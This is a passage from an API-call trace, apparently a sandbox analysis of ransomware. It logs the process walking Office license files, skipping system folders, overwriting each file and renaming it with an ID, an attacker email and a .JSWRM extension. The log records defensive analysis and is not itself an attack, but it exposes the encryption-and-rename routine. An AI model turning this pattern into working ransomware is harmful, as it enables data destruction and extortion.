dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.531] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6798) returned 1 [0108.531] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a80) returned 0x205850 [0108.531] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a80, lpOverlapped=0x0) returned 1 [0108.533] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.534] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a80, lpOverlapped=0x0) returned 1 [0108.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0108.534] CloseHandle (hObject=0x45c) returned 1 [0108.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0108.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0108.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0108.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0108.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0108.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0108.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.534] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0108.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0108.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0108.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.535] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9cd8b66, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9cd8b66, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9d977b6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d72, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="PRB183~1.XRM")) returned 1 [0108.535] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.535] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.535] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.535] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.535] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.535] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.535] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.536] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.536] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.536] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0108.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0108.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0108.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0108.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0108.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0108.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0108.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0108.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0108.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0108.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0108.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.537] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11634) returned 1 [0108.537] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0108.537] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0108.539] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.539] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0108.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.539] CloseHandle (hObject=0x45c) returned 1 [0108.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0108.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0108.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0108.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0108.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0108.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0108.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.540] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0108.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0108.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0108.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.541] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9c8c6af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9c8c6af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9d4b270, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x259a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdVL_KMS_Client-ul.xrm-ms", cAlternateFileName="PR1880~1.XRM")) returned 1 [0108.541] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0108.541] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0108.541] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0108.541] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0108.541] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned -1 [0108.541] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned 1 [0108.541] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0108.541] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.541] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned -1 [0108.541] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned 1 [0108.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0108.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_KMS_Client-ul.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_KMS_Client-ul.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0108.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0108.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_KMS_Client-ul.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0108.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_KMS_Client-ul.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0108.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0108.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0108.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0108.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0108.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.542] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9626) returned 1 [0108.542] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2590) returned 0x24c1d0 [0108.542] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2590, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2590, lpOverlapped=0x0) returned 1 [0108.762] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.762] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2590, lpOverlapped=0x0) returned 1 [0108.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.763] CloseHandle (hObject=0x45c) returned 1 [0108.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0108.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0108.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0108.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0108.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0108.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.764] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0108.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0108.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.766] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9c66463, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9c66463, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9d2504f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdVL_MAK-pl.xrm-ms", cAlternateFileName="PR961E~1.XRM")) returned 1 [0108.766] lstrcmpiW (lpString1="ProjectStdVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0108.766] lstrcmpiW (lpString1="ProjectStdVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0108.766] lstrcmpiW (lpString1="ProjectStdVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0108.766] lstrcmpiW (lpString1="ProjectStdVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0108.766] lstrcmpiW (lpString1="ProjectStdVL_MAK-pl.xrm-ms", lpString2="recovery") returned -1 [0108.766] lstrcmpiW (lpString1="ProjectStdVL_MAK-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.766] lstrcmpiW (lpString1="ProjectStdVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.766] lstrcmpiW (lpString1="ProjectStdVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.766] lstrcmpiW (lpString1="ProjectStdVL_MAK-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.766] lstrcmpiW (lpString1="ProjectStdVL_MAK-pl.xrm-ms", lpString2="msocache") returned 1 [0108.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0108.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0108.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0108.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241358, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0108.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0108.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0108.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0108.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0108.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240f70, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0108.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0108.766] RtlAllocateHeap (HeapHandle=0x1e0000, 